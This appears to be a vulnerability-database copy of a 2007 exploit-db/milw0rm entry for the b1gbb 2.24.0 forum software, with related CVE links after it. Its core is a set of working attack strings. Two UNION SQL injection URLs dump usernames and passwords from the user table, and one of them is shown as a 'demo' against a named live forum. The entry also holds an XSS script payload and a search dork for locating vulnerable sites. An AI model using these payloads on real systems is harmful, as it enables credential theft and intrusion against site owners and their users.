Lucene search
GoLd_MEDB-ID:4122HistoryJun 28, 2007 - 12:00 a.m.
b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting
2007-06-2800:00:00
GoLd_M
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
# b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities
# D.Script :
http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
# Exploits SQL :
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
OR
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
Demo
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
# Exploit XSS :
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
# Dork:
"powered by b1gBB (b1g Bulletion Board)"
# Discovered by:
GoLd_M = [Mahmood_ali] & t0pP8uZz
# Homepage:
http://www.Tryag.Com/cc
# Sp.Thanx To :
Tryag-Team & G0t-Root.Net
# milw0rm.com [2007-06-28]Related
prion
prion
Cross site scripting
2007-07-05 22:30:00
Sql injection
2007-07-05 22:30:00
cve
cve
CVE-2007-3590
2007-07-05 22:30:00
CVE-2007-3589
2007-07-05 22:30:00
nvd
nvd
CVE-2007-3589
2007-07-05 22:30:00
CVE-2007-3590
2007-07-05 22:30:00
cvelist
cvelist
CVE-2007-3590
2007-07-05 22:00:00
CVE-2007-3589
2007-07-05 22:00:00